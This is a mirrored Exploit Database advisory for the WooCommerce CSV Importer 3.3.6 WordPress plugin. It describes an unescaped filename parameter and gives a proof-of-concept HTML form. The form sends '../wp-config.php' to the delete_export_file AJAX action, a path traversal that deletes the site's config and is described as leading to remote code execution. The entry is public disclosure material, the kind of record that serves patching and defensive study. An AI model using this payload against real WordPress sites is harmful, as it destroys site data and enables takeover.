WooCommerce CSV-Importer-Plugin 3.3.6 – Remote Code Execution

• Exploit Database
• 18 阅读

• 作者： Lenon Leite
  日期： 2018-04-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44433/

• # Exploit Title:Plugin Woocommerce CSV importer 3.3.6 – RCE – Unlink
  # Date: 08/04/2018
  # Exploit Author: Lenon Leite
  # Vendor Homepage: *https://wordpress.org/plugins/woocommerce-csvimport/
  # Software Link: *https://wordpress.org/plugins/woocommerce-csvimport/
  # Contact: http://twitter.com/lenonleite
  # Website: http://lenonleite.com.br/
  # Category: webapps
  # Version: 3.3.6
  # Tested on: Ubuntu 16.1
  #
  
  1 - Description
  
   - Type user access: any user registered.
   - $_POST['filename'] is not escaped.
  
  2. Proof of Concept
  
  <form method="post"
   action="http://target/wp-admin/admin-ajax.php?action=delete_export_file">
   <input type="text" name="filename" value="../wp-config.php">
   <input type="submit">
  </form>
  
  
   - Date Discovery : *11/23/2017*
   - Date Vendor Contact : *12/29/2017*
   - Date Publish : 08/04/2018
   - Date Resolution :
  
   
  #*Atenciosamente*
  #
  #*Lenon Leite*